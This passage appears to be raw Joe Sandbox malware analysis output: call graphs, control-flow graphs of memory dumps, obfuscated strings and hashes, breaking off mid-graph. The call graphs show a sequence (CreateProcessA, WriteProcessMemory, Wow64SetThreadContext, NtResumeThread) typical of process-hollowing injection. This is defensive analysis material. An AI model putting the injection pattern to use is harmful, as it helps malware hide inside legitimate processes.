55708->55656 55710 69c2470 55709->55710 55711 69c24a9 55710->55711 55764 69c273c 55710->55764 55768 69c2ee3 55710->55768 55772 69c2921 55710->55772 55776 69c24e0 55710->55776 55780 69c2680 55710->55780 55784 69c2a0b 55710->55784 55788 69c2b4f 55710->55788 55792 69c254e 55710->55792 55796 69c2a4d 55710->55796 55800 69c2972 55710->55800 55804 69c2f54 55710->55804 55808 69c28d8 55710->55808 55812 69c2dbf 55710->55812 55816 69c2c3e 55710->55816 55820 69c24dc 55710->55820 55711->55662 55728 69c2487 55727->55728 55729 69c273c 2 API calls 55728->55729 55730 69c24dc 2 API calls 55728->55730 55731 69c2c3e 2 API calls 55728->55731 55732 69c2dbf 2 API calls 55728->55732 55733 69c28d8 2 API calls 55728->55733 55734 69c2f54 2 API calls 55728->55734 55735 69c2972 2 API calls 55728->55735 55736 69c24a9 55728->55736 55737 69c2a4d 2 API calls 55728->55737 55738 69c254e 2 API calls 55728->55738 55739 69c2b4f 2 API calls 55728->55739 55740 69c2a0b 2 API calls 55728->55740 55741 69c2680 2 API calls 55728->55741 55742 69c24e0 2 API calls 55728->55742 55743 69c2921 2 API calls 55728->55743 55744 69c2ee3 2 API calls 55728->55744 55729->55736 55730->55736 55731->55736 55732->55736 55733->55736 55734->55736 55735->55736 55736->55662 55737->55736 55738->55736 55739->55736 55740->55736 55741->55736 55742->55736 55743->55736 55744->55736 55746 69c2498 55745->55746 55747 69c24d6 55745->55747 55748 69c24a9 55746->55748 55749 69c273c 2 API calls 55746->55749 55750 69c24dc 2 API calls 55746->55750 55751 69c2c3e 2 API calls 55746->55751 55752 69c2dbf 2 API calls 55746->55752 55753 69c28d8 2 API calls 55746->55753 55754 69c2f54 2 API calls 55746->55754 55755 69c2972 2 API calls 55746->55755 55756 69c2a4d 2 API calls 55746->55756 55757 69c254e 2 API calls 55746->55757 55758 69c2b4f 2 API calls 55746->55758 55759 69c2a0b 2 API calls 55746->55759 55760 69c2680 2 API calls 55746->55760 55761 69c24e0 2 API calls 55746->55761 55762 69c2921 2 API calls 55746->55762 55763 69c2ee3 2 API calls 55746->55763 55748->55662 55749->55748 55750->55748 55751->55748 55752->55748 55753->55748 55754->55748 55755->55748 55756->55748 55757->55748 55758->55748 55759->55748 55760->55748 55761->55748 55762->55748 55763->55748 55765 69c2536 55764->55765 55824 69c8185 55765->55824 55828 69c8190 55765->55828 55769 69c2536 55768->55769 55770 69c8185 CreateProcessA 55769->55770 55771 69c8190 CreateProcessA 55769->55771 55770->55769 55771->55769 55773 69c2536 55772->55773 55774 69c8185 CreateProcessA 55773->55774 55775 69c8190 CreateProcessA 55773->55775 55774->55773 55775->55773 55777 69c2513 55776->55777 55778 69c8185 CreateProcessA 55777->55778 55779 69c8190 CreateProcessA 55777->55779 55778->55777 55779->55777 55781 69c2536 55780->55781 55781->55780 55782 69c8185 CreateProcessA 55781->55782 55783 69c8190 CreateProcessA 55781->55783 55782->55781 55783->55781 55785 69c2536 55784->55785 55786 69c8185 CreateProcessA 55785->55786 55787 69c8190 CreateProcessA 55785->55787 55786->55785 55787->55785 55789 69c2536 55788->55789 55790 69c8185 CreateProcessA 55789->55790 55791 69c8190 CreateProcessA 55789->55791 55790->55789 55791->55789 55793 69c2536 55792->55793 55794 69c8185 CreateProcessA 55793->55794 55795 69c8190 CreateProcessA 55793->55795 55794->55793 55795->55793 55797 69c2536 55796->55797 55798 69c8185 CreateProcessA 55797->55798 55799 69c8190 CreateProcessA 55797->55799 55798->55797 55799->55797 55801 69c2536 55800->55801 55802 69c8185 CreateProcessA 55801->55802 55803 69c8190 CreateProcessA 55801->55803 55802->55801 55803->55801 55805 69c2536 55804->55805 55806 69c8185 CreateProcessA 55805->55806 55807 69c8190 CreateProcessA 55805->55807 55806->55805 55807->55805 55809 69c2536 55808->55809 55810 69c8185 CreateProcessA 55809->55810 55811 69c8190 CreateProcessA 55809->55811 55810->55809 55811->55809 55813 69c2536 55812->55813 55814 69c8185 CreateProcessA 55813->55814 55815 69c8190 CreateProcessA 55813->55815 55814->55813 55815->55813 55817 69c2536 55816->55817 55818 69c8185 CreateProcessA 55817->55818 55819 69c8190 CreateProcessA 55817->55819 55818->55817 55819->55817 55821 69c2513 55820->55821 55822 69c8185 CreateProcessA 55821->55822 55823 69c8190 CreateProcessA 55821->55823 55822->55821 55823->55821 55825 69c8190 CreateProcessA 55824->55825 55827 69c837c 55825->55827 55829 69c81f4 CreateProcessA 55828->55829 55831 69c837c 55829->55831 55833 69c9258 WriteProcessMemory 55832->55833 55835 69c92af 55833->55835 55835->55668 55837 69c9258 WriteProcessMemory 55836->55837 55839 69c92af 55837->55839 55839->55668 55841 69c9888 NtResumeThread 55840->55841 55843 69c9905 55841->55843 55843->55678 55845 69c98d0 NtResumeThread 55844->55845 55847 69c9905 55845->55847 55847->55678 55849 69c899d Wow64SetThreadContext 55848->55849 55851 69c89e5 55849->55851 55851->55683 55853 69c8958 Wow64SetThreadContext 55852->55853 55855 69c89e5 55853->55855 55855->55683 55591 68f9e84 55594 68fde00 VirtualProtect 55591->55594 55592 68f5da9 55592->55591 55593 68f9eb1 55592->55593 55594->55592 55950 68f6752 55951 68f6754 55950->55951 55953 68fde00 VirtualProtect 55951->55953 55952 68f67a2 55953->55952 55954 24e4c20 55955 24e4c2b 55954->55955 55958 24e47d0 55955->55958 55959 24e47db 55958->55959 55960 24e47e0 2 API calls 55959->55960 55961 24e4c26 55960->55961 55972 24ea930 55973 24ea93f 55972->55973 55975 24eaa28 55972->55975 55976 24eaa39 55975->55976 55977 24eaa5c 55975->55977 55976->55977 55978 24eac60 GetModuleHandleW 55976->55978 55977->55973 55979 24eac8d 55978->55979 55979->55973 55856 24e4c51 55857 24e4c5e 55856->55857 55860 24e47e0 55857->55860 55859 24e4c65 55861 24e47eb 55860->55861 55864 24e47f0 55861->55864 55863 24e4d05 55863->55859 55865 24e47fb 55864->55865 55868 24e4990 55865->55868 55867 24e4de2 55867->55863 55869 24e499b 55868->55869 55872 24e49c0 55869->55872 55871 24e4ef4 55871->55867 55873 24e49cb 55872->55873 55878 24e7a10 55873->55878 55875 24e7f19 55875->55871 55876 24e7cf0 55876->55875 55883 24ec9f0 55876->55883 55879 24e7a1b 55878->55879 55880 24e94da 55879->55880 55887 24e9538 55879->55887 55891 24e9529 55879->55891 55880->55876 55884 24eca11 55883->55884 55885 24eca35 55884->55885 55895 24ecba0 55884->55895 55885->55875 55888 24e957b 55887->55888 55889 24e9586 KiUserCallbackDispatcher 55888->55889 55890 24e95b0 55888->55890 55889->55890 55890->55880 55892 24e957b 55891->55892 55893 24e9586 KiUserCallbackDispatcher 55892->55893 55894 24e95b0 55892->55894 55893->55894 55894->55880 55897 24ecbad 55895->55897 55896 24ecbe7 55896->55885 55897->55896 55899 24eb400 55897->55899 55900 24eb40b 55899->55900 55901 24ed8f8 55900->55901 55903 24ecd04 55900->55903 55904 24ecd0f 55903->55904 55905 24e49c0 2 API calls 55904->55905 55906 24ed967 55905->55906 55906->55901 55911 68ff130 55912 68ff157 55911->55912 55915 68ff238 55912->55915 55916 68ff278 VirtualAlloc 55915->55916 55918 68ff213 55916->55918
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ca0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ,nq$4$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq
                                          • API String ID: 0-162385967
                                          • Opcode ID: 9d5c507b4acec96968f432524f70a124f9c1c85146704708e2ef226482292955
                                          • Instruction ID: 49f07febe43f6dec430e8c3247464b705c17293f9ad54d47207b387ac6918763
                                          • Opcode Fuzzy Hash: 9d5c507b4acec96968f432524f70a124f9c1c85146704708e2ef226482292955
                                          • Instruction Fuzzy Hash: 15B21534B002198FDB54CFA9C994BADB7B6BF88348F158199E505AB3A5CB70ED81CF50
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ca0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ,nq$4$$jq$$jq$$jq$$jq
                                          • API String ID: 0-3947795074
                                          • Opcode ID: 7e17bd7686fc23d25f4c3a2bdf281efff92da04019130f89c03d6ff5d28e2ac6
                                          • Instruction ID: ebacfb5f4b2ea887a159c10af1599f0244acabd4b8549fbeac110c65159b6a43
                                          • Opcode Fuzzy Hash: 7e17bd7686fc23d25f4c3a2bdf281efff92da04019130f89c03d6ff5d28e2ac6
                                          • Instruction Fuzzy Hash: 9722E734B00219CFDB64DFA5C994BADB7B2FF48348F1581A9D509AB2A5DB30AD81CF50

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1142 69d39e8-69d3a09 1144 69d3a0b 1142->1144 1145 69d3a10-69d3af7 1142->1145 1144->1145 1147 69d3afd-69d3c3e 1145->1147 1148 69d41f9-69d4221 1145->1148 1192 69d3c44-69d3c9f 1147->1192 1193 69d41c2-69d41ec 1147->1193 1151 69d4927-69d4930 1148->1151 1153 69d422f-69d4239 1151->1153 1154 69d4936-69d494d 1151->1154 1155 69d423b 1153->1155 1156 69d4240-69d4334 1153->1156 1155->1156 1174 69d435e 1156->1174 1175 69d4336-69d4342 1156->1175 1179 69d4364-69d4384 1174->1179 1177 69d434c-69d4352 1175->1177 1178 69d4344-69d434a 1175->1178 1180 69d435c 1177->1180 1178->1180 1184 69d43e4-69d4464 1179->1184 1185 69d4386-69d43df 1179->1185 1180->1179 1206 69d44bb-69d44fe 1184->1206 1207 69d4466-69d44b9 1184->1207 1196 69d4924 1185->1196 1199 69d3ca4-69d3caf 1192->1199 1200 69d3ca1 1192->1200 1204 69d41ee 1193->1204 1205 69d41f6-69d41f7 1193->1205 1196->1151 1203 69d40d7-69d40dd 1199->1203 1200->1199 1208 69d3cb4-69d3cd2 1203->1208 1209 69d40e3-69d415f 1203->1209 1204->1205 1205->1148 1235 69d4509-69d4512 1206->1235 1207->1235 1212 69d3d29-69d3d3e 1208->1212 1213 69d3cd4-69d3cd8 1208->1213 1248 69d41ac-69d41b2 1209->1248 1215 69d3d45-69d3d5b 1212->1215 1216 69d3d40 1212->1216 1213->1212 1217 69d3cda-69d3ce5 1213->1217 1221 69d3d5d 1215->1221 1222 69d3d62-69d3d79 1215->1222 1216->1215 1223 69d3d1b-69d3d21 1217->1223 1221->1222 1227 69d3d7b 1222->1227 1228 69d3d80-69d3d96 1222->1228 1225 69d3ce7-69d3ceb 1223->1225 1226 69d3d23-69d3d24 1223->1226 1229 69d3ced 1225->1229 1230 69d3cf1-69d3d09 1225->1230 1234 69d3da7-69d3e12 1226->1234 1227->1228 1231 69d3d9d-69d3da4 1228->1231 1232 69d3d98 1228->1232 1229->1230 1236 69d3d0b 1230->1236 1237 69d3d10-69d3d18 1230->1237 1231->1234 1232->1231 1239 69d3e14-69d3e20 1234->1239 1240 69d3e26-69d3fdb 1234->1240 1241 69d4572-69d4581 1235->1241 1236->1237 1237->1223 1239->1240 1250 69d3fdd-69d3fe1 1240->1250 1251 69d403f-69d4054 1240->1251 1242 69d4514-69d453c 1241->1242 1243 69d4583-69d460b 1241->1243 1246 69d453e 1242->1246 1247 69d4543-69d456c 1242->1247 1279 69d4784-69d4790 1243->1279 1246->1247 1247->1241 1255 69d41b4-69d41ba 1248->1255 1256 69d4161-69d41a9 1248->1256 1250->1251 1257 69d3fe3-69d3ff2 1250->1257 1253 69d405b-69d407c 1251->1253 1254 69d4056 1251->1254 1258 69d407e 1253->1258 1259 69d4083-69d40a2 1253->1259 1254->1253 1255->1193 1256->1248 1261 69d4031-69d4037 1257->1261 1258->1259 1265 69d40a9-69d40c9 1259->1265 1266 69d40a4 1259->1266 1263 69d4039-69d403a 1261->1263 1264 69d3ff4-69d3ff8 1261->1264 1268 69d40d4 1263->1268 1270 69d3ffa-69d3ffe 1264->1270 1271 69d4002-69d4023 1264->1271 1272 69d40cb 1265->1272 1273 69d40d0 1265->1273 1266->1265 1268->1203 1270->1271 1274 69d402a-69d402e 1271->1274 1275 69d4025 1271->1275 1272->1273 1273->1268 1274->1261 1275->1274 1280 69d4796-69d47f1 1279->1280 1281 69d4610-69d4619 1279->1281 1296 69d4828-69d4852 1280->1296 1297 69d47f3-69d4826 1280->1297 1282 69d461b 1281->1282 1283 69d4622-69d4778 1281->1283 1282->1283 1286 69d466d-69d46ad 1282->1286 1287 69d4628-69d4668 1282->1287 1288 69d46f7-69d4737 1282->1288 1289 69d46b2-69d46f2 1282->1289 1300 69d477e 1283->1300 1286->1300 1287->1300 1288->1300 1289->1300 1305 69d485b-69d48ee 1296->1305 1297->1305 1300->1279 1309 69d48f5-69d4915 1305->1309 1309->1196
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133358737.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69d0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: TJoq$Tejq$pnq$xbmq
                                          • API String ID: 0-1294180740
                                          • Opcode ID: 1045460b6ae606ee5753bd74659684e8f98757ab883df64bd554c1b8eab6c9c4
                                          • Instruction ID: c2ff9660519ad761e13b4c6c4ad93268e21e32ee3cae841481db82e37c43ef41
                                          • Opcode Fuzzy Hash: 1045460b6ae606ee5753bd74659684e8f98757ab883df64bd554c1b8eab6c9c4
                                          • Instruction Fuzzy Hash: 89A2C575E00228CFDB65CF69C984A99BBB2FF89300F1581E9D509AB365DB319E81CF50

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1311 69c4260-69c4281 1312 69c4288-69c4318 call 69c4dba 1311->1312 1313 69c4283 1311->1313 1318 69c431e-69c435b 1312->1318 1313->1312 1320 69c435d-69c4368 1318->1320 1321 69c436a 1318->1321 1322 69c4374-69c448f 1320->1322 1321->1322 1333 69c44a1-69c44cc 1322->1333 1334 69c4491-69c4497 1322->1334 1335 69c4c98-69c4cb4 1333->1335 1334->1333 1336 69c4cba-69c4cd5 1335->1336 1337 69c44d1-69c4634 call 69c30b8 1335->1337 1348 69c4646-69c47db call 69c09d8 call 69c0758 1337->1348 1349 69c4636-69c463c 1337->1349 1361 69c47dd-69c47e1 1348->1361 1362 69c4840-69c484a 1348->1362 1349->1348 1363 69c47e9-69c483b 1361->1363 1364 69c47e3-69c47e4 1361->1364 1365 69c4a71-69c4a90 1362->1365 1366 69c4b16-69c4b81 1363->1366 1364->1366 1367 69c484f-69c4995 call 69c30b8 1365->1367 1368 69c4a96-69c4ac0 1365->1368 1385 69c4b93-69c4bde 1366->1385 1386 69c4b83-69c4b89 1366->1386 1397 69c4a6a-69c4a6b 1367->1397 1398 69c499b-69c4a67 call 69c30b8 1367->1398 1374 69c4ac2-69c4b10 1368->1374 1375 69c4b13-69c4b14 1368->1375 1374->1375 1375->1366 1388 69c4c7d-69c4c95 1385->1388 1389 69c4be4-69c4c7c 1385->1389 1386->1385 1388->1335 1389->1388 1397->1365 1398->1397
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133325507.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69c0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: foq$8$I?~n
                                          • API String ID: 0-3888458177
                                          • Opcode ID: bfe83c2a52b96a4b8b7bf2ac6ad803bc160e4a65a43fea059ffc51a2c0595dcb
                                          • Instruction ID: da1b996442044bcfaf4569a46e385a294d02b32eabcb64dc6e87fec4747620a9
                                          • Opcode Fuzzy Hash: bfe83c2a52b96a4b8b7bf2ac6ad803bc160e4a65a43fea059ffc51a2c0595dcb
                                          • Instruction Fuzzy Hash: E552D675E006298FDBA4DF68C850AD9BBB1FF89310F1085EAD909A7355DB30AE85CF50

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1789 69d4cfa-69d4d36 1790 69d4d3d-69d4e5f 1789->1790 1791 69d4d38 1789->1791 1795 69d4e61-69d4e77 1790->1795 1796 69d4e83-69d4e8f 1790->1796 1791->1790 2073 69d4e7d call 69d7898 1795->2073 2074 69d4e7d call 69d7888 1795->2074 1797 69d4e96-69d4e9b 1796->1797 1798 69d4e91 1796->1798 1800 69d4e9d-69d4ea9 1797->1800 1801 69d4ed3-69d4f1c 1797->1801 1798->1797 1802 69d4eab 1800->1802 1803 69d4eb0-69d4ece 1800->1803 1809 69d4f1e 1801->1809 1810 69d4f23-69d51e8 1801->1810 1802->1803 1805 69d6637-69d663d 1803->1805 1806 69d663f-69d665f 1805->1806 1807 69d6668 1805->1807 1806->1807 1809->1810 1836 69d5c18-69d5c24 1810->1836 1837 69d51ed-69d51f9 1836->1837 1838 69d5c2a-69d5c62 1836->1838 1839 69d51fb 1837->1839 1840 69d5200-69d5325 1837->1840 1847 69d5d3c-69d5d42 1838->1847 1839->1840 1875 69d5365-69d53ee 1840->1875 1876 69d5327-69d535f 1840->1876 1848 69d5d48-69d5d80 1847->1848 1849 69d5c67-69d5ce4 1847->1849 1859 69d60de-69d60e4 1848->1859 1864 69d5d17-69d5d39 1849->1864 1865 69d5ce6-69d5cea 1849->1865 1862 69d60ea-69d6132 1859->1862 1863 69d5d85-69d5f87 1859->1863 1870 69d61ad-69d61f8 1862->1870 1871 69d6134-69d61a7 1862->1871 1956 69d5f8d-69d6021 1863->1956 1957 69d6026-69d602a 1863->1957 1864->1847 1865->1864 1869 69d5cec-69d5d14 1865->1869 1869->1864 1894 69d6601-69d6607 1870->1894 1871->1870 1903 69d53fd-69d5481 1875->1903 1904 69d53f0-69d53f8 1875->1904 1876->1875 1896 69d61fd-69d627f 1894->1896 1897 69d660d-69d6635 1894->1897 1916 69d62a7-69d62b3 1896->1916 1917 69d6281-69d629c 1896->1917 1897->1805 1930 69d5490-69d5514 1903->1930 1931 69d5483-69d548b 1903->1931 1906 69d5c09-69d5c15 1904->1906 1906->1836 1919 69d62ba-69d62c6 1916->1919 1920 69d62b5 1916->1920 1917->1916 1922 69d62d9-69d62e8 1919->1922 1923 69d62c8-69d62d4 1919->1923 1920->1919 1927 69d62ea 1922->1927 1928 69d62f1-69d65c9 1922->1928 1926 69d65e8-69d65fe 1923->1926 1926->1894 1927->1928 1932 69d64be-69d6526 1927->1932 1933 69d6365-69d63dd 1927->1933 1934 69d62f7-69d6334 1927->1934 1935 69d6450-69d64b9 1927->1935 1936 69d63e2-69d644b 1927->1936 1966 69d65d4-69d65e0 1928->1966 1979 69d5516-69d551e 1930->1979 1980 69d5523-69d55a7 1930->1980 1931->1906 1968 69d659a-69d65a0 1932->1968 1933->1966 1961 69d633e-69d6360 1934->1961 1935->1966 1936->1966 1981 69d60c5-69d60db 1956->1981 1958 69d602c-69d6085 1957->1958 1959 69d6087-69d60c4 1957->1959 1958->1981 1959->1981 1961->1966 1966->1926 1972 69d6528-69d6586 1968->1972 1973 69d65a2-69d65ac 1968->1973 1984 69d658d-69d6597 1972->1984 1985 69d6588 1972->1985 1973->1966 1979->1906 1994 69d55a9-69d55b1 1980->1994 1995 69d55b6-69d563a 1980->1995 1981->1859 1984->1968 1985->1984 1994->1906 2001 69d563c-69d5644 1995->2001 2002 69d5649-69d56cd 1995->2002 2001->1906 2008 69d56dc-69d5760 2002->2008 2009 69d56cf-69d56d7 2002->2009 2015 69d576f-69d57f3 2008->2015 2016 69d5762-69d576a 2008->2016 2009->1906 2022 69d57f5-69d57fd 2015->2022 2023 69d5802-69d5886 2015->2023 2016->1906 2022->1906 2029 69d5888-69d5890 2023->2029 2030 69d5895-69d5919 2023->2030 2029->1906 2036 69d5928-69d59ac 2030->2036 2037 69d591b-69d5923 2030->2037 2043 69d59ae-69d59b6 2036->2043 2044 69d59bb-69d5a3f 2036->2044 2037->1906 2043->1906 2050 69d5a4e-69d5ad2 2044->2050 2051 69d5a41-69d5a49 2044->2051 2057 69d5ad4-69d5adc 2050->2057 2058 69d5ae1-69d5b65 2050->2058 2051->1906 2057->1906 2064 69d5b74-69d5bf8 2058->2064 2065 69d5b67-69d5b6f 2058->2065 2071 69d5bfa-69d5c02 2064->2071 2072 69d5c04-69d5c06 2064->2072 2065->1906 2071->1906 2072->1906 2073->1796 2074->1796
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133358737.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69d0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 2$$jq
                                          • API String ID: 0-2230393480
                                          • Opcode ID: 2f94db3c1b7c470df87e5516aa4bb75123b387412d40df0c524467b720be0786
                                          • Instruction ID: b61a06d37d5b0a0c870b335ecf2f1752f1ee73ae9684da7edfd0db79274d6e04
                                          • Opcode Fuzzy Hash: 2f94db3c1b7c470df87e5516aa4bb75123b387412d40df0c524467b720be0786
                                          • Instruction Fuzzy Hash: 16E2E474E056288FDB64DF68D88469EBBF2FB89300F1081E9D509A7359DB34AE85CF50

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2075 6ca35b0-6ca35ca 2076 6ca35cc-6ca35d3 2075->2076 2077 6ca35d6-6ca35e2 2075->2077 2079 6ca363e-6ca3641 2077->2079 2080 6ca35e4-6ca35f1 2077->2080 2081 6ca3643-6ca3645 2079->2081 2082 6ca3654-6ca3657 2079->2082 2087 6ca380f-6ca3847 2080->2087 2088 6ca35f7-6ca3627 2080->2088 2086 6ca364d 2081->2086 2084 6ca3659-6ca3677 2082->2084 2085 6ca367d-6ca3680 2082->2085 2084->2085 2094 6ca384e-6ca3899 2084->2094 2089 6ca3686-6ca368c 2085->2089 2090 6ca3805-6ca380c 2085->2090 2086->2082 2087->2094 2115 6ca3629-6ca3632 2088->2115 2116 6ca3634-6ca3637 2088->2116 2089->2090 2093 6ca3692-6ca369b 2089->2093 2100 6ca369d-6ca36ac 2093->2100 2101 6ca36d3-6ca36d9 2093->2101 2123 6ca389b-6ca38a8 2094->2123 2124 6ca38d2-6ca38d4 2094->2124 2100->2101 2111 6ca36ae-6ca36c7 2100->2111 2102 6ca36df-6ca36e8 2101->2102 2103 6ca37e4-6ca37ea 2101->2103 2102->2103 2114 6ca36ee-6ca36fa 2102->2114 2103->2090 2106 6ca37ec-6ca37fc 2103->2106 2106->2090 2119 6ca37fe-6ca3803 2106->2119 2111->2101 2120 6ca36c9-6ca36cc 2111->2120 2125 6ca3798-6ca37dc 2114->2125 2126 6ca3700-6ca3728 2114->2126 2115->2079 2116->2079 2119->2090 2120->2101 2123->2124 2131 6ca38aa-6ca38d0 2123->2131 2127 6ca3d1f-6ca3d26 2124->2127 2125->2103 2126->2125 2137 6ca372a-6ca3767 2126->2137 2131->2124 2142 6ca38d9-6ca390d 2131->2142 2137->2125 2150 6ca3769-6ca3796 2137->2150 2151 6ca3913-6ca391c 2142->2151 2152 6ca39b0-6ca39bf 2142->2152 2150->2103 2153 6ca3922-6ca3935 2151->2153 2154 6ca3d27-6ca3d2f 2151->2154 2158 6ca39fe 2152->2158 2159 6ca39c1-6ca39d7 2152->2159 2163 6ca399e-6ca39aa 2153->2163 2164 6ca3937-6ca3950 2153->2164 2162 6ca3a00-6ca3a05 2158->2162 2170 6ca39d9-6ca39f5 2159->2170 2171 6ca39f7-6ca39fc 2159->2171 2167 6ca3a48-6ca3a64 2162->2167 2168 6ca3a07-6ca3a28 2162->2168 2163->2151 2163->2152 2164->2163 2180 6ca3952-6ca3960 2164->2180 2177 6ca3a6a-6ca3a73 2167->2177 2178 6ca3b2c-6ca3b35 2167->2178 2168->2167 2184 6ca3a2a 2168->2184 2170->2162 2171->2162 2177->2154 2183 6ca3a79-6ca3a96 2177->2183 2181 6ca3b3b 2178->2181 2182 6ca3d1d 2178->2182 2180->2163 2193 6ca3962-6ca3966 2180->2193 2185 6ca3b49-6ca3b57 call 6ca1070 2181->2185 2186 6ca3b42-6ca3b44 2181->2186 2187 6ca3ba6-6ca3bb4 call 6ca1070 2181->2187 2182->2127 2205 6ca3b1a-6ca3b26 2183->2205 2206 6ca3a9c-6ca3ab2 2183->2206 2188 6ca3a2d-6ca3a46 2184->2188 2198 6ca3b59-6ca3b5f 2185->2198 2199 6ca3b6f-6ca3b72 2185->2199 2186->2127 2200 6ca3bcc-6ca3bcf 2187->2200 2201 6ca3bb6-6ca3bbc 2187->2201 2188->2167 2193->2154 2197 6ca396c-6ca3985 2193->2197 2197->2163 2237 6ca3987-6ca399b 2197->2237 2211 6ca3b63-6ca3b65 2198->2211 2212 6ca3b61 2198->2212 2207 6ca3b7b-6ca3b89 call 6ca1070 2199->2207 2208 6ca3b74-6ca3b76 2199->2208 2209 6ca3c60-6ca3c71 call 6ca1070 2200->2209 2210 6ca3bd5-6ca3be3 call 6ca1070 2200->2210 2203 6ca3bbe 2201->2203 2204 6ca3bc0-6ca3bc2 2201->2204 2203->2200 2204->2200 2205->2177 2205->2178 2206->2205 2238 6ca3ab4-6ca3ac2 2206->2238 2223 6ca3b8b-6ca3b91 2207->2223 2224 6ca3ba1 2207->2224 2208->2127 2221 6ca3c89-6ca3c8c 2209->2221 2222 6ca3c73-6ca3c79 2209->2222 2225 6ca3bfb-6ca3c0e call 6ca1070 2210->2225 2226 6ca3be5-6ca3beb 2210->2226 2211->2199 2212->2199 2221->2182 2231 6ca3c92-6ca3ca3 call 6ca1070 2221->2231 2228 6ca3c7b 2222->2228 2229 6ca3c7d-6ca3c7f 2222->2229 2232 6ca3b93 2223->2232 2233 6ca3b95-6ca3b97 2223->2233 2224->2127 2242 6ca3c10-6ca3c16 2225->2242 2243 6ca3c26-6ca3c33 2225->2243 2234 6ca3bef-6ca3bf1 2226->2234 2235 6ca3bed 2226->2235 2228->2221 2229->2221 2246 6ca3cbb-6ca3ccb call 6ca1070 2231->2246 2247 6ca3ca5-6ca3cab 2231->2247 2232->2224 2233->2224 2234->2225 2235->2225 2237->2163 2238->2205 2252 6ca3ac4-6ca3ac8 2238->2252 2248 6ca3c1a-6ca3c1c 2242->2248 2249 6ca3c18 2242->2249 2243->2209 2256 6ca3c35-6ca3c43 call 6ca1070 2243->2256 2260 6ca3ccd-6ca3cd3 2246->2260 2261 6ca3ce3-6ca3cf0 2246->2261 2253 6ca3caf-6ca3cb1 2247->2253 2254 6ca3cad 2247->2254 2248->2243 2249->2243 2252->2154 2257 6ca3ace-6ca3af7 2252->2257 2253->2246 2254->2246 2267 6ca3c5b 2256->2267 2268 6ca3c45-6ca3c4b 2256->2268 2257->2205 2276 6ca3af9-6ca3b17 2257->2276 2262 6ca3cd7-6ca3cd9 2260->2262 2263 6ca3cd5 2260->2263 2261->2182 2269 6ca3cf2-6ca3d03 call 6ca1070 2261->2269 2262->2261 2263->2261 2267->2127 2270 6ca3c4f-6ca3c51 2268->2270 2271 6ca3c4d 2268->2271 2277 6ca3d1b 2269->2277 2278 6ca3d05-6ca3d0b 2269->2278 2270->2267 2271->2267 2276->2205 2277->2127 2279 6ca3d0f-6ca3d11 2278->2279 2280 6ca3d0d 2278->2280 2279->2277 2280->2277
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ca0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Pljq$$jq
                                          • API String ID: 0-1466860515
                                          • Opcode ID: d0ee1e08cecf4a12c9f80d1253baf56b347cd0d186b07105a2e4d94d290c70e4
                                          • Instruction ID: 0e573a1496bc8f9bb9f416fa580a152a09f687287353149a202a078520867d47
                                          • Opcode Fuzzy Hash: d0ee1e08cecf4a12c9f80d1253baf56b347cd0d186b07105a2e4d94d290c70e4
                                          • Instruction Fuzzy Hash: 35328C30B0024ACFDB54DF69C9A4A6AB7F6BF89304B2585A9D40ACB3B5DB31DC41CB50

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2871 69c4250-69c4281 2872 69c4288-69c4318 call 69c4dba 2871->2872 2873 69c4283 2871->2873 2878 69c431e-69c435b 2872->2878 2873->2872 2880 69c435d-69c4368 2878->2880 2881 69c436a 2878->2881 2882 69c4374-69c448f 2880->2882 2881->2882 2893 69c44a1-69c44cc 2882->2893 2894 69c4491-69c4497 2882->2894 2895 69c4c98-69c4cb4 2893->2895 2894->2893 2896 69c4cba-69c4cd5 2895->2896 2897 69c44d1-69c4634 call 69c30b8 2895->2897 2908 69c4646-69c47db call 69c09d8 call 69c0758 2897->2908 2909 69c4636-69c463c 2897->2909 2921 69c47dd-69c47e1 2908->2921 2922 69c4840-69c484a 2908->2922 2909->2908 2923 69c47e9-69c483b 2921->2923 2924 69c47e3-69c47e4 2921->2924 2925 69c4a71-69c4a90 2922->2925 2926 69c4b16-69c4b81 2923->2926 2924->2926 2927 69c484f-69c4995 call 69c30b8 2925->2927 2928 69c4a96-69c4ac0 2925->2928 2945 69c4b93-69c4bde 2926->2945 2946 69c4b83-69c4b89 2926->2946 2957 69c4a6a-69c4a6b 2927->2957 2958 69c499b-69c4a67 call 69c30b8 2927->2958 2934 69c4ac2-69c4b10 2928->2934 2935 